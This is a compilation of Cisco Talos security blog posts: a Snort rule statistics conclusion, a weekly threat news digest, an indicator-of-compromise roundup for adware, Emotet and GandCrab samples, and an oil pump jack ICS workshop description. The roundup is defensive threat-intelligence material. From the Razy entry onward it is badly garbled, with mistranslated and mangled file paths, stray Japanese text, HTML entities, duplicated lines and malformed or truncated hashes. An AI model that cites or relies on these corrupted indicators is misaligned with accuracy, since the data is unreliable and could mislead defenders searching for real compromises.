For outbound connections, we observed a significant shift toward the "PUA-Other" class, which is primarily cryptocurrency miner outbound connection attempts. Cryptomining can consume large amounts of valuable corporate resources such as electricity and CPU power. For information on how Cisco Security products can help block cryptomining in your enterprise, see our whitepaper published in July 2018.

The most frequently triggered rule within the "Malware-CNC" rule class is the Zeus trojan activity rule mentioned above.

Conclusion

Snort rules detect potentially malicious network activity. Understanding why particular rules trigger and how they protect your systems is an important part of network security. Snort rules detect and block attempts to exploit vulnerable systems, indicating when a system is under attack or has been compromised, and prevent users from interacting with malicious systems. They can also detect reconnaissance and pre-exploitation activity, which indicates that an attacker is trying to identify weaknesses in an organization's security posture. They help organizations become more aware of the activity in their environment and indicate when they should be more suspicious of the security alerts being generated.

As the threat environment changes, you need to ensure that you have the right rules in place to protect your systems. Typically this means making sure the latest rule sets are downloaded and installed promptly. As the Apache Struts vulnerability data shows, the time between a vulnerability being discovered and being exploited can be short.

The most triggered rule of 2018, 1:46237:1 "PUA-Other Cryptocurrency Miner Outbound Connection Attempt", highlights the need to protect IoT devices from attack. Mirai-like malware compromises these systems and tries to use them as part of a botnet for further malicious activity. Network architectures need to be designed with these attacks on small network devices in mind.

Security teams need to understand their network architecture and which rules trigger in their environment. Because the rules are open source, the meaning of a triggered detection can be fully understood. Knowing what network content caused a rule to trigger lets you learn about your network and keep up with both the threat environment and the available protections.

Talos is proud to maintain the open source Snort rules, to support the active community of researchers who contribute to Snort, and to help keep networks safer from attack. We are also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, and to release open source tools and detailed attack write-ups on our blog.

The latest Talos rule detections are available for as little as $29 per year with a personal subscription. See here for Snort business pricing.

Cyber Security Week in Review (February 8)

February 8, 2019 7:51 am

Welcome to this week's Cyber Security Week in Review! Here is the news Cisco Talos thinks you should know about in the security world. To have this news delivered every week, sign up for the Threat Source newsletter here.

This week's top news

  • Attackers continue to exploit a security hole in GoDaddy.com domains. The flaw allows unauthenticated users to send malicious emails through legitimate, dormant domains. Most recently, an attacker group sent a series of sextortion and bomb threat emails, as detailed in a Cisco Talos report. GoDaddy is the world's largest domain name registrar.
  • Email spammers are expanding their reach using a little-known Gmail feature. They create so-called "dotted" addresses by inserting periods between the characters of the local part of an address; Gmail ignores the dots, so every variant is delivered to the same mailbox. An attacker who controls a legitimate account can therefore present many distinct-looking addresses that all route back to them, and send more spam.
  • Facebook is stepping up its crackdown on fake accounts. The social media site removed thousands of pages and profiles posting malicious content; these pages originated from Iran and Indonesia. Earlier this month, politically motivated pages based in Russia and the Philippines were also removed.

From Talos

  • ExileRAT, an evolution of the LuckyCat malware, targets Tibetan users. Talos recently discovered an email campaign sending malicious documents to members of a mailing list tied to the Tibetan exile community. The malware's functionality suggests it is intended to spy on victims.
  • Talos this week published a roundup of the most triggered Snort® rules of last year. Rules protecting users from cryptocurrency miners and Trojans were the most commonly triggered.

Malware roundup

  • A new backdoor targets Linux systems. This remote access trojan, known as "SpeakUp", gains persistence at boot by modifying the local cron utility, executes shell commands, and runs downloaded files.
  • UK bank customers were hit by an SS7 attack, with funds drained from their accounts. The attackers exploited SS7 to intercept users' phone calls and text messages and ultimately steal banking credentials. The latest campaign specifically targeted the UK's Metro Bank.
  • New DanaBot variants target European users. Machines already infected with DanaBot received an "update" delivering a new variant, and the attackers sent malspam to Polish users. These versions use a command and control communication method different from the original 2018 version.

Other news

  • Mozilla is working on a new Firefox feature to protect against side-channel attacks. The new tool aims to be an improved version of Google Chrome's Site Isolation feature, which helps the browser block potential side-channel attacks.
  • The U.S. Department of Justice and Department of Homeland Security have completed an election security report. The investigation, ordered by the White House, examined whether the 2018 midterm elections were affected by foreign interference. It is unknown whether the report will be released.
  • Google patched critical vulnerabilities in Android as part of its February security update. An attacker could completely take over a victim's mobile device using a specially crafted PNG image. According to Google, there is no evidence that the bug has been exploited in the wild.

Threat Roundup for February 1 to February 8

February 8, 2019 11:44 am

Today, Talos is publishing a glimpse into the most prevalent threats it observed between February 1 and February 8. As with previous roundups, this post is not intended as an in-depth analysis. Instead, it summarizes the threats we observed by highlighting key behavioral characteristics and indicators of compromise, and by explaining how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats is non-exhaustive and current as of the date of publication. Please also keep in mind that searching for IOCs is only one part of threat hunting; finding a single IOC does not necessarily mean a system is compromised. Detection and coverage for the following threats may be updated as additional analysis of the threats or vulnerabilities is performed. For the most current information, refer to your Firepower Management Center, Snort.org, or ClamAV.net. For each threat described below, this post lists only 25 of the associated file hashes; the accompanying JSON file contains the complete list of file hashes as well as all other IOCs from this post. As always, remember that all IOCs contained in this document are indicators, and a single IOC does not by itself indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

  • PUA.Win.Adware.Softpulse-6848587-0 (Adware) SoftPulse is adware that may install malicious software, uses anti-virtual-machine techniques, and accesses potentially sensitive information from local browsers.
  • Doc.Downloader.Emotet-6846065-0 (Downloader) Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat capable of delivering a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros sent as malicious email attachments.
  • PUA.Win.Adware.Razy-6847375-0 (Adware) Razy is a common detection name for a Windows Trojan. This set of samples contains encrypted code in the resource section that can be injected into legitimate processes.
  • PUA.Win.Trojan.00519ead-6847245-0 (Trojan) PUA.Win.Trojan.00519ead is a set of malicious adware samples that use the AppInit DLL technique to achieve persistence and perform multiple DNS queries.
  • PUA.Win.Adware.Sanctionedmedia-6818436-0 (Adware) This cluster contains .NET adware samples capable of code injection, opening ports to listen for incoming connections, disabling System Restore, modifying files in system directories, contacting blacklisted domains, modifying the registry, and in some cases even copying themselves to USB drives.
  • Win.Ransomware.Gandcrab-6843341-0 (Ransomware) GandCrab is ransomware that encrypts documents, photos, databases, and other important files using the file extensions ".GDCB", ".CRAB", and ".KRAB". GandCrab is distributed through traditional spam campaigns and multiple exploit kits, including RIG and GrandSoft.

Threats

PUA.Win.Adware.Softpulse-6848587-0

Indicators of Compromise

Registry keys
  • \System Control Set (key path truncated in the source)
    • Value Name: PnpInstanceID
  • (key path missing in the source)
    • Value Name: ProxyBypass
Domain names contacted by malware (does not indicate maliciousness)
  • 6nu2bfmath[.]mrzp97cmg3[.]com
Files and/or directories created
  • %LocalAppData%\Temp\~DF38A714DABA77BAE2.TMP
File hashes (SHA256)
  • 1a74519d1568dece3bc64889f177df271b1bf93c0db86d97bb81e44a45403c2f
  • 1a93550fd9e061d7b572ca6269934ae5d0747e82855420895d41547680e372b7
  • 1e8a9c8f07050897420bccfc612fe39dc11acec47dbb11a9b6d17876c0f1c748
  • 22db5127ccb49f274ab3f46f6a845bcbe693e2ed4069220c9b33c4ba7cb6e7db
  • 2da64c580965f9d0454b9004181ed7fdd5903e93cc41d06578cc968ac4215836
  • 30ff57307b5d4456c64ee80eaacb717cdc1804c1f1c49409c7d583ec9f3de1e3
  • 3ff2a4f01f7bfc31db3a54ecb98c0df737cd575cc11301af3b19ed99bc0e075b
  • 473f7dd0173bafa5de751493de7c7e2cc57fc290aac0ae4d2947cc57dcb8008d
  • 5492869d71c62c3ade2750e79de155104329cc08fdd9e65f9ba7d213868714c8
  • 54d8cb379579ab2063b223f0011d8fa2838368b4b68f070a54b7e06ca62c1f03
  • 5b5c9fd28470e81d23fcd6e5b2ea1bdf7c537ca610535d2f69a23fbd11f8d0cb
  • 5e69b36b133ca551c46014c80afbb8fe2d9f6edd1e49cebcd22ca7bbec82d9ff
  • 6e43c79b858a27b93c87498faba5f60edd11d6472da142229bef6fb1d1310372
  • 78ca808e8428963d80d651655c6f79c8df44448a0d0613eb442a20a3081d0b21
  • 7db57b97495b59e84bca9e7f48b472e7412751b20780f17f453e4cf8c9694543
  • 7fbd028726e320fddbf67a00ac1a43e8d2f7fdc98dcb53c84fbbd77871c88afb
  • 881497c1db786286caae56f5055909c1bba6ccb24628773805f0f3a3a91c0993
  • 8a70ba0afe5efa6f633d97f51043d6be2ff3b3a2e6c5fba979f88a6bce4813e3
  • 92fbd91b969e6f94853430cb11a7ab2eaeaa05faefd2856a4aa55861f035beb0
  • 93b2e125a810723a7bc4e268dccbd784cd95e593077ae59fd9ac4daa9e1a8094
  • 99b1320bd421b716118e2aa11ff0044be4bb8849f96b099c6d7ff106ad80833b
  • 9ec1af22463376ceaf3468b88b000a155aa674ff27910c4a2d7188fb4ed5b315
  • a0ea6c233f4da2e161eb3108b9534d297cb15ec8d17eaf2d22132b0e67e99c4a
  • a1caca2e8b3b96935fcde41509753f4531ec3b9c5f436c7291c422fdf4c1d7ec
  • b2917e4031446976cdba6958df9d7c2d594f657232e0786b0e39039477b13534

Coverage

Screenshots of Detection

AMP
Doc.Downloader.Emotet-6846065-0

Indicators of Compromise

Registry keys
  • \DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyEnable
    • Value Name: ProxyOverride
    • Value Name: AutoConfigURL
    • Value Name: AutoDetect
Mutexes
  • Global\I98B68E3C
  • Global\552FFA80-3393-423d-8671-7BA046BB5906
  • PEMD4
  • PEM19C
  • PEM4F0
  • PEM240
IP addresses contacted by malware (does not indicate maliciousness)
  • 177[.]11[.]50[.]52
  • 195[.]201[.]46[.]139
  • 216[.]119[.]181[.]170
  • 71[.]78[.]24[.]146
  • 217[.]78[.]5[.]120
Domain names contacted by malware (does not indicate maliciousness)
  • estacaogourmetrs[.]com[.]br
  • www[.]intelhost[.]com[.]br
  • restauranthub[.]co[.]uk
  • docksey[.]com
Files and/or directories created
  • ...\Microsoft\Windows\Temporary Internet Files\...\~WRS<...>.tmp (path truncated in the source)
  • %SystemDrive%\TEMP\~$LE1922193.doc
  • %LocalAppData%\Temp\CVR3B09.tmp
  • %LocalAppData%\Temp\~DF0EC263132EE87D9F.TMP
  • %LocalAppData%\Temp\~DF93E860FA48DCAA9A.TMP
  • %LocalAppData%\Temp\~DFCEAA78F57CC3DA47.TMP
  • %AppData%\Microsoft\Office\Recent\FILE1922193.LNK
  • %LocalAppData%\Temp\zjkgwiwg.sq0.psm1
  • %UserProfile%\Documents\20190204\PowerShell_transcript.PC.0Py_SQrs.20190204204359.txt
  • %AppData%\Microsoft\Office\Recent\366814370.doc.LNK
  • %SystemDrive%\...\~$6814370.doc
File hashes (SHA256; several are truncated in the source)
  • 03591121dcf83a4aeb5e5fa12a1c1b75c93f5a215780eb1ebf209cc9518f12d3
  • 04c6555af6871c7818d3df3f0d5bbf9b85efac94e979c58234310b9a36079e78
  • 09be75647f21e12c0c4948ed45c68eb1db6667beece4e1d9748cddd5b4c38eaa
  • 15968dcbcb0514e7fd5bb68ced13112a3f1d8b31cd948b967f3becce9283508a
  • 1a4c6a9c9e4bcce9f83776f87f158d39cb21b78ea839afaa01abf3f93c49a4c
  • 1a7211b1d27124d340b2d1346ba93fc2a91fd00ed3899c95c1e16fc849c54a7
  • 1e83dfa18cc1ccf50dd5118f710bcc16e6c4e178977435c62b4238554bcf7f4
  • 2287689165547b27ed983152dd781bc5377060a8dd911b18671b6050932bf
  • 247adbdf950ad6e592f0276ae72625818f8b41ce1bb7596aa89181e0ce99d4
  • 267af9baaa1401ae4034200940bad6c1f8cb622a7e731ed28fe84fe0682a6616
  • 3bc75dd152bea2d4670d22e2844731646c4a83024a3cd2349d465d5d5c16020ef
  • 607f94f56b7d2e2b01a0b8e0bed7379144363d65e3040f44a197e8245b842c
  • 72da32c1bec496a54885f38802c429bc1aed434651bc6dc4acbac637c0c94ce
  • 76b02247cf6c9a6c436532a536cd2711fa876c15312dd6e0b3863e070e8595c
  • 7fb24419176dd9aa58b53a4246398d40c260c253b4772cb8fdc600324f24318
  • ad6b9cb00268157013c2b547a379a83660f5c7e01ce6893df16cf1db8fd3965
  • af8e1169f130baf122b25ae81d95d62cd3506bae39673652d91ac4c4936049d
  • b5d83480ad61ce204743ef0904cbd2995991944efd3d0d2c9daaca9385f4b290
  • b9cbad9b3cd4a1f08c3284d479ff40093454f76d237839001087cd0add5d468
  • fd46fb328e72be81cb97846b846051a95d2012630a3e3bff5002c390883e

Coverage

Screenshots of Detection
      • Pua. win. adware. razy-6847375-0
      • Indicators of Compromise
      • Local \ msctf. asm. mutexdefault1
      • LOCAL \ RSTRMGR-3887cab8-533f-4C85-B0DC-3E5639f5D511-Session0000
      • LOCAL \ RSTRMGR387CAB8-533f-4C85-B0DC-3E5639f5D511

      Applicable range

      Value Name: ProxyOverride

      %Localapdata%\ TIMP \ IS-51KNV. TMP \ 09131DDB2Cac0B4D4483B4BBC76A26F244Ab5A884350F733E1f60FC684DA039. TMP

      Indicators of Compromise

      • N/A
      • %Localapdata%Tempasis-9EHP6. TMP ¦セットアップ 64. TMP。
      • %Systemdrive%Docume
      • Admini
      • N/A
      • N/A
      • Locals
      • 1 \ TEMP \ IS-CA660C. TMP \ 367042276. TMP
      • %Systemdrive%Docume
      • 1ADMINI
      • 1LOCALS
      • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
      • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
      • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
      • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
      • Asian. exe~%Systemdrive%Docume~1admini~Locals
      • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
      • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
      • Asian. exe~%Systemdrive%Docume~1admini~1LOCALS
      • Asian. exe~%Systemdrive%Docume~1admini~09131ddb2cac0b44483B4BBC76A26F244Ab5a884350F733E1F60FC684DA039
      • Asian. exe~%Systemdrive%Docume~1admini~51c839a1fe25c31ba3903cc47f32880741dd1e708c9e97c81a2ea050802f84db
      • 68b15033f398389c45903085677e375dcaed3a3225d0854f6cbb5a2b45217cb7
      • 6985e3313e82b8cc6b450bb4cb6fcdebfc1b26ec83b0ace499c836d79b0b4fbe
      • 72a1cb206beae974f8d3504128e7892ba6fcbba38f31d7714f0fd811618bb439
      • 7384060612fcb8c40a324c136c571295f361a2e6d7f5b470206b574aed5fe0f4
      • 817ee49531f980991336c020e3d99f67796a38ff88aff948f07f658b083e6801
      • 88888888ec0980085d2a89f43fc32f543dfbe283d7ad0186e5c1089a08795d86b8
      • 9d6c6642a75a6328ef321212b482519ef74c767d9a02d1538debc53f031ee293
      • b0d1ef5415c13028a6fbe16900e255b599781bf3824144413f9364e619480194
      • bb87882c8e8c87e3f0f2accf837d141550fc0a048409b6c0a4aaec4b9829f1a0
      • fa64e7db69b070ef8bad8046cd7539dd1fca1bb63349f04c0e94584cf0a2a7d7
      • Coverage
      • Screenshots of Detection
      • PUA. Win. Trojan. 00519ead-6847245-0
      • Indicators of Compromise
      • \LOCAL SETTINGS\MUICACHE\3E\52C64B7E
      • Value Name: LanguageList
      • Value Name: AppInit_DLLs

      Applicable range

      Value Name: ProxyOverride

      Local\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511

      Indicators of Compromise

      • IsoScope_10c_IESQMMUTEX_0_519
        • IsoScope_10c_IESQMMUTEX_0_303
        • IsoScope_10c_IESQMMUTEX_0_331
        • 13[.]107[.]21[.]200
        • 104[.]200[.]23[.]95
        • Admini
        • 209[.]197[.]3[.]15
        • 188[.]72[.]202[.]44
        • 34[.]226[.]238[.]42
        • 158[.]69[.]244[.]165
        • 212[.]32[.]250[.]31
        • 144[.]202[.]40[.]125
        • 104[.]16[.]13[.]194
        • maxcdn[.]bootstrapcdn[.]com
        • 5isohu[.]com
        • done[.]witchcraftcash[.]com
        • thegoodcaster[.]com
        • www[.]theoffertop[.]com
        • myecomworld[.]net
        • wonderfulworldnow[.]クラブ
        • images[.]clickfunnels[.]com
        • tac25[.]com
        • track[.]rightsearchsmooth[.]club
        • Microsoft Internet Explorer\ Imagestore\aowwxkh
        • %LocalAppData%\Temp\A1D26E2
        • %LocalAppData%Temp\update. exe
        • %LocalAppData%Temp
        • DF32A074D75E28FF74. TMP
        • %ProgramFiles% (x86)㊟Internet Explorer㊟IEShims. dll. tmp
        • %ProgramFiles% (x86)㊟Internet Explorer㊟ieproxy. dll. tmp
        • %ProgramFiles% (x86)╱Java╱jre7╱bin╱ssv. dll. tmp
        • %LocalAppData%Temp
        • DF832EC54C42A76DA7. TMP
        • Intranet Name~%LocalAppData%Temp\is-0UA26. tmp\idp. dll. tmp
        • %LocalAppData%Temp\is-B01CK. tmp
        • %LocalAppData%\Temp\is-B01CK. tmp\c1f44c795198b23f8058492bb82a29addd2eeae623a53296f0195777d6a5fde5. tmp
        • %LocalAppData%\Temp\A1D26E2\116E56C6A8. tmp
        • Intranet Name~%LocalAppData%Temp\is-0UA26. tmp\idp. dll
        • %LocalAppData%Temp\is-0UA26. tmp\itdownload. dll
        • %LocalAppdata%Temp \ IS-0uA26. tmp \ psvince. dll
        • %LocalAppdata%Temp
        • DF12E5A698F292B5F8. tmp. tmp
        • %AppData%Microsoft \ Windows \ Cookies \ YO092G24. txt
        • 06386D249AE1B3CC4BC96BC96281AE89E89E10A85F68DD7E350E3E350E350E350E52FAB4C88A7C02375
        • 1E81d5888f17947BCBE31A74B3761C4FD6B49CB02D3EB4F85E065D8729E08
        • 298B8E26C83BA9FD1BB1FAEB5B0DF909F1D163E7896E26C48D35E041AE6320E
        • 641432c889189C393EDF97CDA9B08E5B08E5B083CBB8EECC5AC09B9D476F8872ECF3B
        • Intranet Name~A073171D4E57C4E308B6A62C0D14E597E95C030C019F428A26EE6C07C07F43557D
        • A5B2EA50F8DCEEC4752888C5E50E364B16253160DD7FB20932D8E5E56AC719
        • C1F44C795198B23F8058492BBB82A29ADDD2EEAE623A53296F019577D6A5FDE5
        • C488C9A61F7BE3A4E7B9B9C51DBEFA36C2FE7B53904D30C38F58DCC1900AEC098B
        • C72E78ABC54E7B785E666E666E0E61181C107A4CF6B9C0519146F9FBF47BA841
        • F1AA892C158EA1779A210D52B9A43124548343D27C9145456D730AA4EE
        • coverage
        • Detected screenshot
        • AMP
        • Pua. win. adware. sanctionedMedia-6818436-0
        • Invitation indicators
        • \ ↪Software↩microsoft↪Software↩windows↪windows↪ftware↩ftware↩currentVers?
        • \ Windows NT ¦ CurrentVersion ¦ IMAGE FILE EXECUTION Options ¦ Supervc. exe

        Applicable range

        Value Name: ProxyOverride

        Value Name: AutoConfigURL

        \ Windows NTCURRENTVERSION ¦ Image file execution option

        Indicators of Compromise

        • \ Windows NT image file execution option
        • \ Windows NT image file execution option
        • \ Windows NT image file execution option
        • \ Microsoft Windows NT image file execution option
        • \ Windows NT image file execution option
        • \ Windows NT image file execution option
        • \ Windows NT image file execution option
        • \ Windows NT image file execution option
        • \ Windows NT image file execution option
        • \ Windows NTCURENTVERSION Image File Execution Options
        • \Microsoft Windows NTCurrentVersion Image File Execution Options
        • \PukiWiki. exe for Microsoft Windows NT
        • \Image File Execution Options for Windows NT
        • \Image File Execution Options for Windows NT
        • \SYSTEM COPTROLSET001
        • Value Name Start
        • GlobalCLR_CASOFF_MUTEX
        • \Clr_CASOFF_MUTEX
        • RV_MUTEX
        • \RV_MUTEX.
        • 158[.]69[.]30[.]89
        • 188[.]70[.]31[.]241
          • x11[.]zapto[.]org
          • sambosaxzx[.]ddns[.]net
          • %SystemDrive%AUTOEXEC. BAT. exe
          • %SystemDrive%boot. ini. exe
          • \ʕ-̫͡-ʔ-̫͡-ʔ
          • \. exe will be executed.
          • %LocalAppData%Temp\xkkr5i_9. out %AllUsersProfile%miner AllUsersProfile%miner\sHXJvbCG. ico %LocalAppData%Temp\xkkr5i_9. 0. vb %LocalAppData%Temp\xkkr5i_9. cmdline %LocalAppData%Temp\xkkr5i_9. tmp AppData%Microsoft♪Windows♪ Start Menu♪Programs♪Startup♪Torrent♪. exe System Drive %SystemDrive%miner \ʬʬʬʬʬ \ʕ͡-ʔ-ʕ \♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪~ \Ъ$Recycle. Bin. exe %SystemDrive%Documents and Settings. exe
          • \Documents and Settings. exe
          • %SystemDrive%Recovery. exe
          • %SystemDrive%\366832936. exe
          • %SystemDrive%DOCUME
          • 1ADMINI
          • 1LOCALS
          • 1Temp Replica. tmp
          • System Drive %DOCUME
          • ADMINI
          • 1LOCALS
          • 1Temp
          • %TEMP%Ecw9cm3. 0. vb
          • %TEMP%_ecw9cm3. cmdline
          • %TEMP%_ecw9cm3. out
          • %TEMP%n02x2nc3. 0. vb
          • %TEMP%
          • 02x2nc3. cmdline
          • %TEMP%n02x2nc3. out
          • %TEMP%nyf8h2nv. 0. vb
          • %TEMP%nyf8h2nv. cmdline
          • %TEMP%nyf 8h2nv. out %TEMP%q8tnr4an. 0. vb %TEMP%qq8tnr4an. cmdline %TEMP%q8tnr4an. out %TEMP%xxrykc4pie. 0. vb %TEMP%rykc4pie. cmdline %TEMP%rykc4pie. out %TEMP%yjua3drf. 0. vb %TEMP%yjua 3drf. cmdline %TEMP%yjua3drf. out System Drive %Documents and Settings\Administrator ︙Start Menu ︙Programs ︙Startup ︙ Torrent. exe %SystemDrive%I386. exe %SystemDrive%IA. SYS. exe %AllUsersProfile%. exe %AllUsersProfile%\miner\366832936. ico %AllUsersProfile%miner³³. exe %AllUsersProfile%MinerIO. ico %AllUsersProfile%minerMSDOS. ico %AllUsersProfile%miner %AllU sersProfile%mineracheacheboot. ico %AllUsersProfile%miner
          • tldr. ico System Drive%RECYCLER. exe %SystemDri ve%Temp. exe %SystemDrive%Users. exe %SystemDrive%\c2d124b8466cec6b3e47c4. exe 0489f71417400080c1ebf6f5cf76655470a83f0f964a2ad54c242daf3012fa7a 0e15e99295dcf13eae 0d5a4d7a 04a55f7fab24e8f189f5ac37cc1007346007ad 1127cc0f06797cd128aa3724b5ecead3613c41fabebd143fcbf19a8d236a8fef 137b894b7f9992f26dd4e6c8d8c2a 09e886466305384b444aac2e2d9e3ee7a19
          • 1f5b1a8b9f7fb4d83bbd012d42fdc725468dc0ed29341bee4c5aa122d83f69f2
          • Asian. exe~%Systemdrive%Docume~1admini~3b3db732aa7ea25346da5ac1a4f0cb56357baf265259c9046885f889b56830da
          • Asian. exe~%Systemdrive%Docume~1admini~4a7bdf882b10e093cb0d82c61e71daaff97971f0cbaf16f61093acdfe149734f
          • 4b08ea2461afbf58ef946d1897ee5d4b2873ad2b261db005a85c4aa43ffeca09
          • 5a85a897a9e5aabf518bd1ff19339cca80543a90ce fdcca5397ac09014fc71be
          • 5da2bf905b77f3b9c4d957458cfb9f133860ddfe5dec741aac55bced51184c1c
          • 5e01d3fbd260656eaf2eb22631ec30ce8433f8288911ef552855108c773580bd
          • 638c303a097d02c40e37 90e506234cd36ea4c907166f4447f50e6f92b7429436
          • 63af1d420682171b535f222861b3bcc90c4da86363ad94a4b666bf489a245e11
          • 66a2ed3db3c55603be3a2ce301cdc71be803b18da51731373a4d23c1d5b0b1a 5
          • 6e0a7315797b5add6dc3b23abdc8d96d0d43e9470bee64f3f5fd12721acd62f9
          • 7051fca8dfa96b8ee78111d72f6945d14f82aceb94f93a891dfe6e5641512b1e
          • 71a577218ae440efb0c6b2a624d90a8713e60ab01 c525a180c15b5b2b9fa8d4e 726787ed97a97d4057caa986bd0956a80ecb446bcbdd9a1c009fb4d1ebccaee2 76b63d0d32b961663c20a01bd478d5cb1358eb1441be a38e2cb8e57c36e0ac41 検出のスクリーンショット
          • AMP Win. Ransomware. Gandcrab-6843341-0 侵害のインジケータ \softwareware ¦microsoft ¦windows ¦currentversion ¦internet settings 値の名前 ProxyEnable 値名:ProxyEnable 値名:ProxyServer 値名:ProxyServer 値名:ProxyOverride Global\pc_group=WORKGROUP& ransom_id=4a6a799098b68e3c \プロキシサーバ値: Proxyverride 66[.]171[.]248[.]178 ipv4bot[.]whatismyipaddress[.]com nomoreransom[.]コイン nomoreransom[.]bit ガンドクラブ[.]ビット dns1[.]soprodns[.]ru dns2[.]sopro dns[.]ru %AppData%\Microsoft\Crypto\RSA\S-1-5- 21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 %AppData%\Microsoft\Protect\S-1-5- 21-2580483871-590521980-3826313501-500\Preferred Parry Internet Files ¦Content. IE5 ¦C5MZMU22 ¦ipv4bot_whatismyipaddress_com[1]. htm %LocalAppData% ¦Microsoft¦Windows¦Temporary Internet Files¦IE5¦SSZWDDXW¦A71QDCIP. htm %LocalAppData%& lt;/p& gt; Microsoft& lt;/p& gt; Windows& lt;/p& gt; Temporary Internet Files& lt;/p& gt; IE5& lt;/p& gt; SSZWDDXW& lt;/p& gt; A71QDCIP. htm %AppData%& lt;/Microsoft\Win32Pipes. 00000328. 0000003d \Win32Pipes. 00000328. 00000041
          • %AppData%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\bb5ca9a3-5378-4a8e-8196-42a28d9ef0c9
          • %AppData%\Microsoft\hjunhw. exe
          • 00e77dd692525ac51843e571dc4401ad383b01f3789a96ad952ad46e9bc30d5d
          • 01ad099c08042d05bcc5c708aeca7a3479f93def36318469c05b3fe2c25a202d
          • 01d3aedbbcfde336cf132fa52fb87f0a39a7e1c55cf8e30e8f79df6fa6cf2a28
          • 021f152e82d84617ac2ba999f436fcf85f35c9c17da8f7adff51d6f6c332c63f
          • 072a1a933df1fe1e0c90b07b30bf82dcc16fd860e47ac94877c25c05b89a1147
          • 087af2abcf44ec68d9f1f55bcbae03e12ff0380ceea4f2197fff9b8d353f417e
          • 098af1ba0b5cf4d27f8122eb37bc7ab009be4f6c812e990639931d8504d3619c
          • 0d20371ebb39d45616ecdc0ebd1ae457f98641a14c8cd3c94e553fe5cb71e128
          • 0e90f5195c0f0c81cd631c90809790490a7a5cac5eae61bf27332b9707f9e3f3
          • 0ffd01cae290d5ff33af6dcd087646bf86a065fd02f196b7dd3afe0bb5c08d75
          • 103f6e49c97ec73d623231fa92f418032ad223c565a7fadb238cc676a6bee79a
          • 110084e96789b6e657a8453d8614c14344e03ca4dac55076afe7ba605a68ca06
          • 112dcf3ef406642f9b2459a27dc79f626d28ac93db3482691eda8db3bbafd80b
          • 119238f37579434b540e2a4cda59261d86e9a9ac0c059dfd2daf699c5a3e6094
          • 1388310e5f683da4ad3e774923c2616a7137dc1da691efea313fccd2a0f88da1
          • 1694e9584805e55badf8da9ce6f8b4122e3bf419bfb22070d3e97b83be0caa73
          • 17517aac50cfcb9b6cd779f466d6ece0ec930071fc58e7b4b391a8e79a7ef49d
          • 1c4b31ea552e67d0e573cc3c4f4c93387e79e931e41742129dcf7b1cdc55d4d5
          • 1c700576a51cdbee44a25972503a64ebc9d4fef602b4702fca9eb02e8622a7dc
          • 1ced683893408d370315083efe988043cb72a864a03a3ded4a94d047d2bec262
          • 1d4f89c1ecd931c4b5cecfba15b76f1d6607417af487654da1d50497bcda1cd9
          • 1e1b83c79a5d2ff5ec3ca325debdb29f66d83f362d2bf0ec4e18c6fbafd6c179
          • 1eff09710c639869bef51b90404569a7917aa23afdd290c8668e617b1757a231
          • 20be9f6a086f07dfc3fbd8a5e6a060e50f360629e428077665980f6e6e401079
          • 20c45b4970eddc186e8e77266e5b2282c6faf4d53559482200c4d43404d23f7a
          • カバレッジ
          • 検出のスクリーンショット
What you can learn from Cisco Talos's new oil pump jack workshop

February 11, 2019 8:02 AM

Paul Rascagneres authored this blog post with contributions from Patrick DeSantis of Cisco Talos ARES (Advanced Research/Embedded Systems).

Executive summary
Every day, more industrial control systems (ICS) are exposed to cyber attacks. When such large and critical machines are connected to a network, attackers have more opportunities to interfere with their operation, and it becomes difficult for those defending an organization's network to cover every possible attack vector. To show how ICS interacts with a network, we have released a 3D-printed model of an oil pump jack connected to a mock programmable logic controller (PLC) that supports two industrial protocols. Throughout the year, Talos will bring this model to several workshops so that participants can try it for themselves. For convenience, we also provide the blueprints and code so you can try it at home.

We are releasing the pump jack 3D print model, the Arduino source code (covering the Modbus over TCP and Ethernet/IP protocols), and the Human Machine Interface (HMI) that controls the pump over the network.

To show how serious it would be for an attacker to control this device in the real world, the GIF below shows how the pump reacts when the motor speed is increased beyond its natural pace.
Description of the hardware

Global architecture

The project is divided into seven parts:

• 3D-printed parts.
• A pump driven by a motor.
• A gauge, driven by a servo motor, showing the motor speed.
• An Arduino UNO board that is the brain of the pump and simulates the PLC.
• An Ethernet-compatible Arduino shield.
• A motor shield that manages the motor and the smoke generator.
• An HMI developed in Python with Flask, to remotely monitor and control the pump.
Oil pump jack 3D object

Object 3 houses the three boards and also includes the gauge that indicates the speed level.
The electronic components that act as the system controller are one Arduino board (Arduino Uno), two shields (Ethernet and motor), one servo motor, one motor, and a smoke generator.

Arduino
The Arduino source code can be downloaded from GitHub. There are two projects: the first supports the Modbus over TCP protocol, and the second supports the Ethernet/IP protocol. Each project includes the Python scripts, the HMI, a protocol scanner, and communication PCAPs used to test the communication.

The Arduino's GPIO pins are used as follows:

• Motor A (the main pump motor) is controlled by pins 6 (PWM) and 7 (direction).
• Motor B (the smoke generator) is controlled by pins 9 (PWM) and 12 (direction).
• Pin 8 drives the speed gauge.

The motor speed can be any value between 5,000 and 15,000; the default is 8,000. Be careful with this: if the speed is too high, the pump may break.

The IP address of the pump controller is statically set to 10.10.10.1, but it can easily be changed in the setup() function.

In the Modbus over TCP protocol, the speed is stored in register 6 and the gauge value in register 7. A register is a 16-bit object in the Modbus protocol.

In the Ethernet/IP protocol, the speed is tag B1:1 and the gauge is tag B1:7. BX:Y is the tag notation Ethernet/IP uses to store values.

Use the Arduino IDE serial port to get debugging output while the pump is running.
Implemented protocols

Modbus over TCP/IP

The following Modbus functions are implemented:

• Read Coils (0x01)
• Read Holding Registers (0x03)
• Write Single Coil (0x05)
